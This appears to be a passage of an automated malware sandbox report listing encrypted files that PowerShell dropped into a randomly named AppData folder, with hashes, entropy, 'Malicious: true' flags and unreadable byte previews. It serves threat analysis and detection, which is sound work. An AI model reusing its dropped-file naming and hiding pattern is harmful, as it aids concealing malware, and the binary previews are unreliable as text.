Preview:	...7...p.PKj..u....f.g.....T..,.....[.....w'.....(.....Z#......X..m.g.....{..."1.:`.CP..U....@<.....b.t?..=9..j7...h..Bo....]..:..&... .;.RZ.H..pZ..v.:..7...w..l.T^...e....k.. ....m....+.2.bA.h.\|.y.2}..<T{7W.`.......:..>..........+....&.mT.....p1....(...g.W.B.A.M.x..G.5I. .......s7....F.../...=...&..x.Avb..u.@....H5%f....8..{H.`]...M.y.a.dC../....Zr.5 .s.'..ma.w"a....`..I.7{...}...h.y.......U..c..&..../;.=........QJ...g....w0...<...JL.p8.......n.KH...p.X( /.i3.O.9....A...<...H...9.r.....P.....x...g.X...3.>J.7...B...cI.2...D...eZ'.U."T.uy......../..%.z.......j....l.fS.w...F....5<....D.e...N.^.."..!.Sg.........m.\...;.).Ab......,S.3...~..c.?h..x...u..sF........yC....cn.....E.f...\.av...>...~a...U[..hF.kN 6A.JN...u..%...[U.......}.Nx.\|....M3.....WuC..V...9..q.j.(`2i.0.(.+D'B....C...."....O..[.B....D..3h...X...@...n......^..&.J.....Q...lT3.\......>.B..Q)...1^...s.T.[....`.<d.}.......G....#...8......DB..%.(.c...A..S......3?,

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\mXrYpGVCRolKMyFIZeg.RuyvwrWOZKzdg Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	88681
Entropy (8bit):	7.997987617734669
Encrypted:	true
SSDEEP:	1536:/AEBKXeYj1Mw4pYhrVlM5dDzAFyh8lnvROIIhskARUnfGLje:/APz/4p4rVl+4ou9vRUskAUfGLC
MD5:	5CB7078AF1F15623052E9CA8A3B92A91
SHA1:	221949AF86B1AE20D1B1ED98AC959A9382DE86A9
SHA-256:	185F60AFDD1F98C0DF4CB958CB2E301CC66C825695774A35ED1AB83D0C5D8C69
SHA-512:	600D22E21DA6B26E27FB53A20E99BA2E2E7B911E6B7800A312D5B22B5D63B5C60835337C0D431F349DF62B8049C9A5F052E5AA11FC378DC445DB8F20554B1436
Malicious:	true
Reputation:	unknown
Preview:	..c~I....A"\|c...........x.e?.u]T...e'p.Vz..."&.e3y.......G..6..(.$Ay.^.iY8./.KB.....9..UkC........T.../...m=....' .l,./.\.J.=C.sE2.[!...DZ..?..w..P....W.I..fF..(....B1.VDA...!.7..2\|..@WB../.k.A...#pi..M...-............G_6&...gv$..\R........<...6\|..."..'...S.N...":[[...<Q_....U.C:...p.....]... ...J./6<..q...b\..h@.gD...A.........S..[..D.......O.\.n..,........0.....[g.L....:=.,m.4.t'..6.(...g.M.@..!..V.o$...eI.}.m.k...#...$I...x..L....l..p.....9...?.X.......Pw1s...4!br!.-.;q.B.?...g@...e ...:..dC....:.v+.......=n..[8N..A..[.!...O-:N_dJ.m..W......%X.W.g...7.A..g.r..-...}.d...I..]...F..6'.V.Y..z..U..n.....@..K......H..Vf..$G...d...tt.4"........_.ec..q\......&W...</....%R..@...`.....H.k.).........._..7j..@.n=..=.......EP.!.&....$7)\..&+y.GF-..S@..Ae.....d.l.q....?g[....Z."7?U....i.o@j......P...[RO......$@..S.t.`....q.o..c......w.I.T.R...)FQ,.._.t...$g.........]'CR.......R...^.c.....:....V..g..2.3..-t.K.......j.bu..g......

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\mzwGWruxqnUhIjTFdB.VXMzbKmqWjGQaoygSxf Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	82824
Entropy (8bit):	7.9976441898879145
Encrypted:	true
SSDEEP:	1536:K9U88HBg509jzDTkVCJmDzMFpa6fDxoPyLfjAqkTTGC6WG1x5:UJ8HnhHk4Jqz0a6fDxoPyLcqkGD5
MD5:	03A0E0D29EF90114D976036D3FCE2FFA
SHA1:	DBE35DC4490D25818CCFFB7BF00E206CE400022F
SHA-256:	2A0F649695634FEC6266619C3D12954AB23410C3CAEC51C9DD7CF89ABDC3B5E3
SHA-512:	4A12C03BBF0FE492AB91C0BACB4778C5168D022FDE63881D13F3D6F285E27F878751B7EDD45BFBFD5589C8D09961D1CF1F41DFEEEFACD8D8E4CF5C08E467ED92
Malicious:	true
Reputation:	unknown
Preview:	qf....R..Bhn[.HF...35r.m1C.m.......R..3..Z.x..........<...b.'4e.a67..]O...I.t>......-w......3...\.u.$...(aH..a$..5Cz.3..p/.....6..o_5./!......d....O.j).[1.)I!d./M.I...h.Y...Dpv3.G...r.`......[......d.;>..f..~.u..f.x[T......M.....2W..`....BX.a..I?.T..z.....m.y....P..N.hY.^8. ..^.TX;...^....r@.1.L.Kf..WH.f.0.....D..\..z. .w;...W........+D-....X...l].\..ct.I.eD..[!;..i...M..6..!...4.\..m."[......r6.O(.YV..f.='.'aFYT...<D.G..{..\|t7.ae....o..O....j..r!..1...7..[.....Pqy6V....L....s...Z.,).qU.8.....1.@..\|.Z.n......1+t.DO/.O.w!AM...z.....:.sU.?..T.9.....v7-M.h-i..D..>.e.R........`..,.\|q.....<.a..].#.R/..9.....T.......;....9..5L..@.#.~.7...5..@..TKP...:Bcx........>?...AtK2.].2.Ca.....[<\|..xRO...h.M.rq.....%....z..%..7..e...!.8\|{..Z>.F^<..S.w.....{.li>.U..n....E}<....,....U.I/P..h#.....^..n..!.5......r.$\...x".<...z...@.p{...4L..m.q..]......l}._.B.xt..N....waJZ!..u......x...sMy.AqzI".cf..6.l......Y".`...+..7).X..!:+.I.4..M..4T..m....L\|.m.YM`......G

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\nGKuTfPVclhRzMF.RWOplPBSuzUXfHML Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	95695
Entropy (8bit):	7.997720353457231
Encrypted:	true
SSDEEP:	1536:Pqw/NkTnBU4DHMkNa3VcS9Zfa2hq71hVfUorQt/SpoeTwgYNeG64/CxDrXCoqhEs:yw/NkbBDDskNe39NqJhOorQxveTINepI
MD5:	D49925B56DA7F83312EACDF2702030B6
SHA1:	B2C0B29A153D441D232724583F3E6245F87D1EFC
SHA-256:	D6AD32158A149452679570876329638481ECD4D84AD5EDD693525A2A2348F0DA
SHA-512:	46E18C42EA31AF8242809150D8711B0322C7968DE7D4EA9AADC54D41AF6DF3B730E257FFBA28694279683AFE38953503001B51AFC69391C3C49724CB1F99C9FB
Malicious:	true
Reputation:	unknown
Preview:	......F* ..}U.!.:.H...f.!oL...;.t/.....9....M.<i....].>..iUbD.P.&..a0..s.............{h?.?...J.!a!cR.....`&'..Y.OWpT....".X@..QB...$./.\,$.B..gv.;5..X..0._-j..].Rj..(....Z.....R.h!.-m^..q....].?..?....hs.k%\:.Z..\|<.%.J..b..+y.Pt....aq>.q.j.7f....}0........H.n..]..r....j.W.H.".`..D......r..../5.^.....y..."R..q('}.\.4....nQ.DY+S .g+..PD....2.6hg..]k.....L'.:e.....&...q.E.i7....{..F7.....M.2.y^j...T2.G.)..>{..).f.......3..m...3....H..2.....6...Jx/...RZC.P...V.H.!0..X.......fTSmDZ.^}.8..C.Q....oy., .1.3.?[...h..Y.O..K..We....)u..A$.N.I....Z^.u...8..J..=.,M.O2l..N.z.Z.Rp....ps.3=,.r-...s. .vxhy<&.>z.qH...@..Q0./..9!W..;^...2..kJ....z..H....ywH....B3.M..N...7..xPF\|.T....;L?./....hD..6f..,.....W)0.,Dn.qF....'..N...bt...%.u.^.R.X.$..;.d....8.\&>u...5....K..!...bJ.x.h!.....lDYNt.3f#'r...]. ...........,...8<...D?".X.x.......G..Yc5`\|.Ehv.%..X^@I@.m..9-....A..n2l.....o..<.)1..W2A...2.~...3...+.d}.}9....ij....V..sp...*!..k).>..0.x..v.aA..?...I-.b.m

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\nGrySpmMqVxJX.kBMYDexpsfrXcSIH Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	89320
Entropy (8bit):	7.997777301575525
Encrypted:	true
SSDEEP:	1536:dTObaIlft0fVsVzAN+pZ0De0CLxk6a0F33yVf0OD6ppuj195W+3UElrkXmnf:dTpIlfMsVz7DI6a8CV8O6uz5p3vlQGf
MD5:	EED4B411D635625FB034954B699D6DE7
SHA1:	1C261DA3D6B860B382FC0FF2DF3A2141D5F0AD7F
SHA-256:	24C38FF9613BEE9B86FD364F4FFB5564059EAA1B1A35177C0303F02E47B1A9AB
SHA-512:	97334A772AB1220334DEB000AC0435DEE141AC4479E7115CF62AAA8504D32C375774AD33F5B9AF906CB07286BA1BA7A249A9DB129B986DEB49B00243313D481D
Malicious:	true
Reputation:	unknown
Preview:	.9...J\|..#..y.Pp....T..B}M.o/5..w...O28...W\|.........(.....xc.G...0h=...yh.......S........e..=.i4..8..ag>\|...@p2..W..B.9t. ..<.%N..B..{S...^c.$..w..P..].......rB".R..\.>..j......h....k.....}..!v.F.~.5cq.G......Y4^.....B.[..D...y..)M.H..#b....#....._.<{..w...T.../..N}..$... .`d..q......a`.Z~.C....<a(.-...9g..4^..V.B.z..Gc..O.L0,.Q(V~...#.F:.m.......n..7TN_(.7Y..6F_..l.w..k.@.m._@zN........Y......k.F....vA...o...%\|v..e.-./..t.....P4....&\...j....H$...a.~.E..y.u...........Z3b.D.....l..."........4e.....a...=KS.I:..oy+.."b.....R.>.-K.....l.P....OTm.E{.. ....^../..$..v..\..m...u.`.&..E.Z=dQ!..nP..4.I..=.S.dS.7J...]Z...ZtfQ...c.Mv%...(.....s....}.q....H2.Z6KF.._.%".A.2.q.Zv.kBw..F6..(._...DLaT.$Z..;.?.v..@...\`Ws.1.5L.d],..".G..L.I...9X..n......`.]MTXi.gI,..a8/....\|....z.%..E..A}U...R......".5...5.c..p.C-..V.m..%.c-aNH. W..(.m....{.6........R.....D..O..T. .....g.....s.\|...,.F..$.....G.6.V%../..+<....>.b..E..R}..axI..E..}L.....O..-...NN..r.l..c

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\nVtwbXEIvzJ.AOzNUvbtED Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	82397
Entropy (8bit):	7.997849281426713
Encrypted:	true
SSDEEP:	1536:RGJ66jjEmHBYyasW93wijgjI6YWoLP+8ChqXJl68sFVt4ChmC5kVZ1:R064jThYW8RquNP+BqXJlyVtaC0Z1
MD5:	0A9B1707C17F15D89E94895D75461824
SHA1:	E61200B95E8D95B3D361A6905D6BFD33099087C9
SHA-256:	EB384787384FDB94698F82764C5ECF676810E3CA7F9A88622278FD3D9A244498
SHA-512:	5DC787C9DB8507E0C0139BA472F24880E3465DBB4AD23DE0A0D5F11C1B3B1F4B41E8752A0E27AD0717CE72C1ADC75DA431E503F40DAED5098AB3FBAC80AF96EB
Malicious:	true
Reputation:	unknown
Preview:	q..w....h.-7....>.6.f.B=.i..^..R.U.[.^Pz).#.....L.Dz..\5..+....^.f.@6e.....;5p.$....qw&M.36. ...bt.]..l..Dm.P.p..........z.]a..Z.....2..t-....x.(....a.M.I...R.0......._....,..W;i.B..zY.Vi.h.T../.[.;./{GM.m...l.R".%..s.^..}..MTth...-....-.z.y.......o..B.E..@.h.&./p.$...2]._.7..f........P.!M.;a..l.....<...9.z\|...zE.t[..63.....F......S........t.v.Od./..i.X...,...,...._#.q!@o?.....4..d.x...8.Yf..].n.fL..g.f.n.2..h'.Gl....r.$..g.`N8..w.DC{.C{..Zt..(.'..Uz..C............u..VY.....J'j.x.....C.tm...\....5X..#,.y1.%..o...j..H2.Y...<E..X9......w9....\|...c..%T.;U.=.:T..}\|..zf~....>.[q..3.+......H..........#...,.U....c. .^y.-.\|.5E.9../\s{.......l...\|(~x9..o...BNY.2H].`DW.............\|.._..]>.C......$A.g.......l......\|LW...D.~.B9s.-...Y3`.M...`.V.OnI\{q.6"...].(.>....-m.........*i....G"$.6...._.."..w.!.-.q..K>q...#.l..i..;;.n1...F.....5.~7?.<;...tF.L..z+B.`V5.k}Y])n..%7.m.)................I{.z..~..V!}t<:Q,...8...q..3c2\wcY#.V..#...fw.Va..r...F.\|..S.K+....

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\nxPNgKjsDlqTdhCk.qzPiXulaygOGreVSUmx Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	84017
Entropy (8bit):	7.9974508693507875
Encrypted:	true
SSDEEP:	1536:HNfX5KjQcMWEZfUlBhb/veiNEmIL8Yw7jblnuWkotFPGw:HN/5Kj8ZfULZvEmIL2jJulot9Gw
MD5:	F14CF39BD229E425443E32CE96CCACC8
SHA1:	FFEB15137A167AB8D4005B1C9E5D4D4BE3DD2BFF
SHA-256:	3A79E82872C1C6471D970D8EFC40EE31653756CCD7ABE4D6635905C458C439DF
SHA-512:	C4D50C63D05A2045CD680E9852C273A4C60E13AEEE24D3AC349A520280E0DD3A1B5460C855F2B0652F2FE12A46E55AC900EFD4FC013F10EDAD8553E57F90AB9D
Malicious:	true
Reputation:	unknown
Preview:	a..."..^.... n.-....3..I.].Yo!.0...kt6..a0.a..6..v.!i....o..h..M..h.p....P<Y'..j.....^.h.A......O.F)w&..~3..\|:.A...~7.......<.HX.1:#.N......X.lK.w.VP.b.3'.(..A.6Dt....m._...3...uS....\.0.`a}...P..wc..caC..'.~N...\|.D<.:./...K...'...a...2;.......`.c._).\.T..d..u.'i.....#...@......'....l.-.r.ty..\|.;E..y...Z....M-_d.pg..f....3.sKIZ.N.[P.......+.....7.a.wU.K..B.l.%..t.......M......m."......:...R8.{...L...a.....W...#r.%..V\..am..o. .\|..1.?..:j.h.X.....P.6./Y.."s.6.T..@......r..osv..,.Th..d.if.3.....#.."..F.._....'..'xB.M.q.`.S~..g.O......Q...gu.<..~..JK%...z2"..Q...4..z....a._p.y5...........#..k.J}V%.b{:......5.H..e...n.....7..N&.#..M.W........p.j.1....Di=Yo..\|..a.......J..{...#..a.XS.......A..o...o. ...H>`.......t..._.c..K.y\|......j....;X....a.q.G.......?........\|-..#.].....p.b.^..8...X....../.~....._....@.~:.uz.#D/6...D....UJ.V...Q.._.4....Q:...:... ....3x..(...(.V.7..K..E....Wk.=.!v....qLM~.GU.....oeL.h...\#.V4nrE%X.9.O.*Bd..(..&

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\oEnktHuazZNx.SihVqjwLFgRKfTOnaxE Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	89954
Entropy (8bit):	7.997695658065355
Encrypted:	true
SSDEEP:	1536:/GIprGIigxaSkyYYEYN7fuwdafR0LxZDAgjgwI0XVzEps+jHohTYSxq:/GUrnnHGDwdARgTL3Z4FjHohUZ
MD5:	D86F55FB69843DC8AE5A5E0A6E8C1363
SHA1:	B520C53AE4937B8D835014CEEFBC863FC9E3F9DF
SHA-256:	0FA196860617539C538B63386CF2DA30D0EC9CD8A2FE1A6E9AE5F15B5BC0AC9B
SHA-512:	640AEF50A0066BABF87394AD71DC8FCE9D1F5C063269BC13A796AD4260A4A68AF03710F76EDF890930080DA14C57C793B80BE6EC51E38E42E022114B77A892A9
Malicious:	true
Reputation:	unknown
Preview:	l......BD.WU.j .t...j...9..Z..<..(y.I..#1#..Y.U...h+...S..vH.z..Gd..\.{i.F..=c.5`...Y.......g8o..0e.B...KF.~.Sn@..{.y'.9.e.......U.m....U..Al.....fh+...!..g.b_}.pz0n..TrKe.d.P.L.}.o.p...A..-..(..aN.+....X........,..h]%Q..g7.QbS1..}\...oy/.h..H...1\|....ry_UE3b./Q.8.6.0...v....6Lg"...:.].Ky.3.x...,.S.K...bU..q...?.>..T.............h.A..\..:.9.d.J...o.!].dl..{.F.M.@RM._..t.....w......X...kY.;..C.%..."..<..P..7.....}.=t...Ve9....l.Hly.o/=I.z".7g4....8.?.....xz...0D....7h.y4.._.I.5..I,]b..#o.fW.{7......_.Y...//..+!q..a-Q..Y....'..H......x?...,..3.h.C.9...\|"'...:>Kd.6-W.?q..U..P}...\....*......H.AK.....c........s.@..o...U}...C..1....X...&..?c.WVf.`B..F....%...x.......[X..U...4....h.....f........P.5.<....U.....0.....%.fuEfNO...&^.3..?...T....>.....0+4..5J{.jl...&R...9]d.O...i....2.cs...{..M(....\2P..j...;.zm.......e2s.Q.aQ..b?.@....^...\|........,.c.A.I.....@....!{.....g.?...c....].=....p4..gd`..<.l..>....\|-vQ..C4........Q.....~h-.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\oflJPunmFGs.NdsmBvfojFTyWlI Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	62871
Entropy (8bit):	7.996751935071929
Encrypted:	true
SSDEEP:	1536:HfhhW+GuacptBCK/sXl8qxrBZRxwzVVJluylOnghwXP:HfhhNG4C9VvFDxwZVplOnxXP
MD5:	B859CACE31F87CB864496B5E8D4793F3
SHA1:	4C602CA5C578E61131B725B16D2D7478AD5CEE2A
SHA-256:	91B32FAEF611326957656832327934350AFE6572BA56918C2C6FAECF67281666
SHA-512:	C8EB68D7F0D4841A152B62DE9D9FAB9039186A784AA957CBF4C54E2ECB9D14864B5791BBBCFB4D0173FFA853377676DE36046B410D40C9D14BD8B41E895CB35E
Malicious:	true
Reputation:	unknown
Preview:	j> ...G...SK.uh8>..#...v....d..1.........v:]y.0.^...5y...Q.2\|.^..w_...7d.l...o..x,~.`HI..~..D.C....f.HB...{.H.".0...Mq..edC8.N..e...8M/...;..g....V:.B.OO....R].2.%.....;/..Ih..\::..+.y...K..rl.'..x..1.S.......XDp.h%.......8.F.!.!..X..,-x....d...St..Q.?.L[:..I..I.)...X......$.y.....bRF...g..j..h..D...@..".6.L.W..q..`.R..re#3....l....X.$=}=..G.4[.....w.x..n.~...>.]..do...&.X.....\|.....u.qC...:[...E1.h.P7....o......Q....k.VZ#.o=.:.K.T..U.f..........4........D5.A.\-.......2pe.....R...0.Z..S..;P.....C....\|..~..A...B.,....d.....C..b(.qy.'E5JT.W.m.q..$.s4.....}.."W;...=.`l......t.?.....A....U....a...........&....^_L...d..D.w.........u.i.c.f...{....e....'TU2e...I^.6]4..`m..:....0......{..\|.l..E....-...L.H?.P..u.0hNS.w.w..l%.?..N.F...`.I\|.<l7.o.....c(.....'-.....J.Un...8.\|..../4t.../....v"N..`5.%.N[..X.<v........F.C.^L.BK..F....)......^.(\U..........p......A..{..(B....G..s)..K`.!...^?~.\C...e..w.q..n..tL-/..c.,.....aP.$......B.#o.M..)....Si

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\owUjuETAskFtI.qdfyhSEnlFiLpzH Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	83140
Entropy (8bit):	7.997485323941614
Encrypted:	true
SSDEEP:	1536:F14dJO6lxSPa18B8FTfEann7Xklo+qth9O0fW0bofZUtSQcWT+KyhyztgUBlvma:gdJOUjFl7UDqth9O0fWXxUgmyFUB8a
MD5:	120A6472EAA7039435DC3DD4B9E40C02
SHA1:	F48FB854DC5E09CA45DD52AE77B13FBF211D6C5C
SHA-256:	898D1C8A452EF77159A8F023AEC445CE6481BB5464294427BC2502C2B3354547
SHA-512:	C3C4D52FE17EB604FFC55E60FCCE15430938F628060741B136B970BAB1500483325B29242D371439EA4D328D22E922190E7D5C0258E921D3372D8B555629F86D
Malicious:	true
Reputation:	unknown
Preview:	...7...p.PKj..u....f.g.....T..,.....[.....w'.....(.....Z#......X..m.g.....{..."1.:`.CP..U....@<.....b.t?..=9..j7...h..Bo....]..:..&... .;.RZ.H..pZ..v.:..7...w..l.T^...e....k.. ....m....+.2.bA.h.\|.y.2}..<T{7W.`.......:..>..........+....&.mT.....p1....(...g.W.B.A.M.x..G.5I. .......s7....F.../...=...&..x.Avb..u.@....H5%f....8..{H.`]...M.y.a.dC../....Zr.5 .s.'..ma.w"a....`..I.7{...}...h.y.......U..c..&..../;.=........QJ...g....w0...<...JL.p8.......n.KH...p.X( /.i3.O.9....A...<...H...9.r.....P.....x...g.X...3.>J.7...B...cI.2...D...eZ'.U."T.uy......../..%.z.......j....l.fS.w...F....5<....D.e...N.^.."..!.Sg.........m.\...;.).Ab......,S.3...~..c.?h..x...u..sF........yC....cn.....E.f...\.av...>...~a...U[..hF.kN 6A.JN...u..%...[U.......}.Nx.\|....M3.....WuC..V...9..q.j.(`2i.0.(.+D'B....C...."....O..[.B....D..3h...X...@...n......^..&.J.....Q...lT3.\......>.B..Q)...1^...s.T.[....`.<d.}.......G....#...8......DB..%.(.c...A..S......3?,

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\pjOhWoBHKPycIq.RUHcBqgSFNlAnsrut Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	172973
Entropy (8bit):	7.998931895489503
Encrypted:	true
SSDEEP:	3072:8UeRW24XzkwrVO1ITOn66XAVWRqN9hrWFPceReN5Mp6xSAL/nHlPFNeqQ2br0RK:ARWHznVO1R66QVWqr+cceNgmS4FtNhQi
MD5:	48FE18F198ED47BE1D63491A61DE442E
SHA1:	9D15CE9D11DD0AAFA7B6713B2A96A484CDFC73FC
SHA-256:	A4A5847EE1489F8A3D8C91ABB6BDA35C54A33BC1A3BD3842BA7E419C4A8B24D4
SHA-512:	512A3AECBFFB08906A4A7F96942B1A5BF77EDDC5A54B226E74F5F5A95C71CF81CE7AD8D2674AF8DD98D2680DEAD650D943E584A4EA51F3D99A07A8F54CBBD253
Malicious:	true
Reputation:	unknown
Preview:	...%Y...,..$UI1.o>..:8>U......8...7..H\Yz.k......5R..jk.U.U...^#a7..y.zw...j.....<...;v. U.}..m......W.......=.Q..UZt%.-.#..s8>J.G..Q...H.C.5.....v.32.d$..3..g..L$....".o...9..Mb...../)...B.l.......S.. x..D.UZ...4zS..5=J,.4_c..G..n%S....=...0......{.C..C"..x...........2>Vm.XL...X..s.~.(..i3.......x.XC.G.'+E$.8.%.)YV;t"^.:...&....c..<....E5.....G.G...V.ar.ob...X#.S...w<..)}.......iU....{.Kc..:b..5..8..@.?..~AX..B..I.....v..M04.k..&L.;.+.<.......r_.M....1.$X.......>...V...=.8H../.E..7..o.H.^.9.oO.o..u.\|....a.p.G..^.V-X......k.=.K.hq.-.,...*..ha~..d...:d...p.S..5fmg...TN....;..C:3....I.".....3..s$c}Mv....<.-..os....,..2..=...8...-.)...\|.n...s[........N........c.......(.7.&f..c().[.A........o=...d.....<.9k(.....yK......@.J.(=.F.-'.(.[.......v6v........'....wJ....UQ..JW./tQA..-I,.i=..ii(.uU...Y..%.8.9l.]p....gJ...6...QZ...z. e....e.B..#L...u....8.#.4]v.a...]OL......#9q_......nV.N..D.3.-r...j ^.H&......KO..0.g../.......q.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\pjtyMvCHWgUiF.SFegkQGOAshafHDyYMc Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	67166
Entropy (8bit):	7.997481587987124
Encrypted:	true
SSDEEP:	1536:2cMoQOMcNxBKtOPqn0O1RSDCLe4yWIfM5kM3rG:g1OMcJKtOPS14a2WI05kMbG
MD5:	2719EF5DC80CF8B287373F4FC8742A0C
SHA1:	712682D91EDEB7073E0A65220A800C3750FFF017
SHA-256:	2E3BD8B79F3E5A3BC84C673759B2B47564CA894BDF09CA9DB7096F6F2E9913F6
SHA-512:	B12C32E742069A747FD72BA6243CDD83EF7570455E141331BFCF381DBC32562AEABA04027974D1A1A438E604DEE618FF17AA68DA25D4BB886E972380601CA8F1
Malicious:	true
Reputation:	unknown
Preview:	k...M.3__....U.......e...~f..#&v".....i.#F.c..C`...\........si;.!n.?..........;......'b.d+.......e!TQs..v.h.(....c .DG{.:q...........x...R...P...w.yl........t..WFY@....x....n....x..2...^.....P...G....S.A.k0r.~..g.x&@......:6..6...z....b...5H...Vu-..V4...4P.........%.w...S.NA.T..YE..'Q..Z.K......iz.%.e..k._\|.....z.......d..]..y@. o.U..I&.wD...:Z.3...oi]m.F....;.i..y.......#..[...C...;Ia....@..f..>M....d.+...7..5...R>EX.....$0.F.I..@.Q.0P......X....j..]...}....K..Z...0h".(.".t.HZD.1.I......l.!..X..j....G.......{l.k....Q].jM.d..u..9.E..c7........k;.`...w,I^......JP..qu..l.uO6...F...U.D....&.....d@R6.....(....g>.1r....W.n..4gSdV\|r....2`!.#...#..._.4x\......<.8$ZV. O.N...4...k..rH....P.}....._....{w...gmR.J...L...`..+.h..........9L...6.......I(c.}.....6..?@...'V..U1Hc.".....3.~./L.........6e!.V&'.\|,_...k7O].....Fs.2.O.o....g... k..r.O.v.gvGF..\...@..ww.?r.H.2.!.EY.q.t...a......)......Q..5..%`m..IP..~oMa...=.P..u..^.b8.Dt..l.......G

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\puembgBHRLv.ptgvIKAqlDPxSJZXVE Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	125292
Entropy (8bit):	7.998717410368311
Encrypted:	true
SSDEEP:	3072:JRgdL2kX0Gs7LgHrDodHMmbjhwyVfDdv9wwcYYYYcPJn1Y:JQEVKrDommbjhZ8Yzxy
MD5:	11373AC925E050F1F3098E7C2CDD157B
SHA1:	1923D726E20A58489BBE94E691480B77B495A807
SHA-256:	3CFDF62CCDDB0213964C7142A3B6C3DAFD40061B8DC9B73234BB8A78691545A5
SHA-512:	3763B9CDDC32417F0D3694F83985CB233278EC859915A04954BA203B9CA7E8DB05C9AD2D02970C695AF705FB8C116DCEE48373CCAB6F468CC8B6B45157A6A2BF
Malicious:	true
Reputation:	unknown
Preview:	[...+.6V.......U3.....'...Bt:Z....U..%_....kG...~Pxz..uG......h.>..Ua...4H.......f._7.tSF+.......-..93.2.F..............i...."Y-....`.r......U...z...K..&.d6.O...\.....go....-.oq..JX.v&...;wE...N........,...^P.U.N.~.z...5+.......\|.+L;.hJ6.vCt..P.n..x....n.R....5J"O....C.Jn.'..L.....XoaO..b...)......w4.n.g..Zq+G...`..0.x.y%..T....y..ZEW..... ..Z.T.....B=.O..x...8.5...@...h2.....z...sn.M.F.gIi..@."$.....~...TU"...#....g.8..ASBj..... /.l.n>..Ell..j....f%vwO=V.'h}L.P...Y.....FI.Pv..6..F......qd.4.......Vw.r.0.h.V'uF\|...9>;...x)RN..?.cR'y...._.H..<..\|....]d..c.H..H...#..^Mmp.$...;.d...%.....".@+}.Jax..xJ...?.6i.39.3....5&G;.-D`V.=..%.Y..y..a.....m.......1. ~.........h.&.7....!R.h...j.'....g.....N.2u...3.n.R\..1d......Y+....6..".=...;.7../s.L=..'..[.&..W..q.7.H9..>R..k..}..*g..O.l......!.<+e.P.W.k9..P.5...G.(e.r(.f.....S@.&.B8.9!......~.Y.3.zN.>V.J^..{....p.D....}.&..i.4s......#.2&K..o1j.QX.k.+..#t.^.p}.$P.zW..Eu.[......6.\D.d..j...2.(.K.u..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\qdWyiuOhFVCkzKjv.OJzpTlMGcQav Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	100839
Entropy (8bit):	7.998031565337679
Encrypted:	true
SSDEEP:	1536:syaVJFmm28BDIbuXR6aVICs6qstV389Bvx1yrhNxN3HEPv2JQymr9MLBCB1L:LcmmTBDIclthsjyrhNxN3HEPYQymOCD
MD5:	B7F1D867728C692869673563E456F876
SHA1:	75B6CABAF9C96EB48D8459CC2A0B6277FBEC60E7
SHA-256:	BC9429E75161AEAB1A132BF74ADB8C5560FFE0B812DFA1C3AE5A6D42DB11CB99
SHA-512:	80DB2294C4FC7D29405F815FD44BC3E61006B2AB8ECB42969957DE172B4F2032D1E0DE1CCB139C43FF23E34374C8CAA7D046FE64D11D09306E914F05623B480A
Malicious:	true
Reputation:	unknown
Preview:	.T.qR....L.....2kD..R6......&.T...7..4-....3......_-..cO...B..nYX(..6....-..."...c..}.L..I..If;........rGY._.l.Zdd.....].....I.X.Ec...S.Sp[........8.f....Q.q......y56..s....9$...W..J......s....o9\..[.T5....UMe!?..m....z3.@....4....._.....q.....-6.............T.H..I...c.....2.0.z3S.-......B..7.....+y.y.........i..........QL.p.m.K.N..q...}.0.8m..5\|...4...(.VV..T.....)..O1.e...&.:XS.../.I..s...$....R.@\|.1}.../.r......%.....a..oK...:....Y.9=..]a.......r./..W.[.\|...._.Q..^.....x.....+...v` .e-....p....-..n.]....E....6...0Fg1.......G.bIH.....h...`:.k...c{=._&.......W.R...}G.=...X)-.e....._.Hw.szK.b.LH...N.3t.q!.....o...K.w.6..N....JcS.....r..-.B.h..@l..^%..~1.......L..#q...a`%....;.<p.l.@....rq;..6]MH..~g. ...*"..........R`..R.$...T......(K.4...W..6.@d/`eT...y0.yy\|...L......3..x._.GI%\I@S.r..../}.D,.m.LZ. .......13.}...._.............. ..U.I..s...9u....B...g".J.X..{6....!~6.....6.K...T....2.....0...NF......u.['...6..{.d\.M......Tv....

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\qnVzZGgruf.EJwAxkHGVP Download File
